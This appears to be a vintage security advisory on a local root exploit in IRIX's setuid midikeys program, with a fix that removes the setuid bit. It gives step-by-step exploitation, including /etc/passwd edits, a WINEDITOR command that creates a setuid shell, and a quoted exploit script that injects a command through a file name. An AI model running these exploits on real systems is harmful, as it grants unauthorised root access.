COMMAND
midikeys
SYSTEMS AFFECTED
IRIX 6.2, 6.3, 6.5, 6.5.3
PROBLEM
Larry W. Cashdollar found following (tested on IRIX64 devel 6.5
05190004). The setuid root binary midikeys can be used to read
any file on the system using its gui interface. It can also be
used to edit anyfile on the system. One can get from guest
account access to root access using the following procedure.
1) Choose an unpassworded account and telnet in (like guest or lp)
devel 25% id
uid=998 gid=998(guest)
2) Execute the midikeys application with display set to your host
devel 26% ./midikeys
devel 27% Xlib: extension "GLX" missing on display "grinch:0.0".
Xlib: extension "GLX" missing on display "grinch:0.0".
3) under the midikeys window click sounds and then midi songs.
This will open a file manager type interface.
4) You can enter the path and filename of files you which to read.
including root owned with group/world read/write permissions
unset.
5) If you select a file like "/usr/share/data/music/README" it
will appear in a text editor. Use the text editor to open
/etc/passwd and make modifications at will. Save and enjoy.
So, you can remove the '*' from sysadm...
$ su sysadm
# id
uid=0(root) gid=0(sys)
devel 28% ls -l /usr/sbin/midikeys
-rwsr-xr-x 1 root root 218712 Jan 10 17:19 /usr/sbin/midikeys
You just need an account to gain root priviliges; it's not limited
to the unpassworded accounts, any normal user could use this
exploit. This was verified to work on an O2 running IRIX 6.3
(IRIX o2 6.3 O2 R10000 12161207 IP32) and on an Octane running
IRIX 6.5.3 (IRIX64 octane 6.5 6.5.3m 01221553 IP30). It seems
that whether or not you use a vi or some other editor makes a
difference. So far, with vi won't work, but if you open an X11
editor (gvim), it will run as root, and you will be able to edit
anything, again... At the end, it turns out that one does not
need any particular text editor to exploit the vulnerability.
That's because of a nice "feature" of the desktop environment
variable WINEDITOR that can be set to any system command, e.g.,
"/bin/chmod 4755 /tmp/bsh" (where /tmp/bsh is just a root-owned
copy of Bourne shell). This can be done on both irix 6.2 (e.g.,
using toolchest -> Desktop -> Customize ->Desktop ->Default
Editor: Other...) and on irix 6.5 (toolchest -> Desktop ->
Customize -> Utilities -> Text Editor: Other...). After setting
WINEDITOR (which can be verified by inspecting
~/.desktop-hostname/desktopenv) the exploit follows the
well-known path by running midikeys, opening a file manager, etc.
Similar approach to exploit this vulnerability was given by
Loneguard:
#!/bin/sh
#
# Irix 6.x soundplayer xploit - Loneguard 20/02/99
#
# Good example of how bad coding in a non-setuid/priviledged process
# can offer up rewt
#
cat > /tmp/crazymonkey.c << 'EOF'
main() {
setuid(0);
system("cp /bin/csh /tmp/xsh;chmod 4755 /tmp/xsh");
}
EOF
cc -o /tmp/kungfoo crazymonkey.c
/usr/sbin/midikeys &
echo "You should now see the midikeys window, goto the menu that allows you to play sounds and load a wav. This will bring up a soundplayer window. Save the wav as 'foo;/tmp/kungfoo' and go find a rewt shell in tmp"
This works fine on Irix 6.4 here... although some people had to
change csh to sh... csh returned permission denied, 4755 and all.
Problem here is that various csh's won't run setuid-root scripts
unless you specify (I think) the -b flag. From the Solaris csh
man page:
...
-b Force a "break" from option processing. Subsequent
command line arguments are not interpreted as C
shell options. This allows the passing of options
to a script without confusion. The shell does not
run set-user-ID or set-group-ID scripts unless
this option is present.
...
then again, maybe it was done deliberately to foil script kiddies.
SOLUTION
Unpassworded account? That's a known (and documented) feature on
IRIX systems. First thing you do when you unpack an IRIX box:
set a root password and disable the open accounts (EZsetup,
OutOfBox, lp, guest, 4Dgifts, sgiweb). There's even an entry in
the "System manager" to do it. Remove suid bit.
After a chmod u-s midikeys, midikeys still works, at least after a
very quick test. However, removal of the setuid permission
disables functionality that is not implemented or utilized at this
time. So,
% ls -la /usr/sbin/midikeys
-rwsr-xr-x 1 root sys 218712 Mar 8 14:57 /usr/sbin/midikeys
% /bin/su -
#
# /bin/chmod 555 /usr/sbin/midikeys
# ls -la /usr/sbin/midikeys
-r-xr-xr-x 1 root sys 218712 May 20 13:57 /usr/sbin/midikeys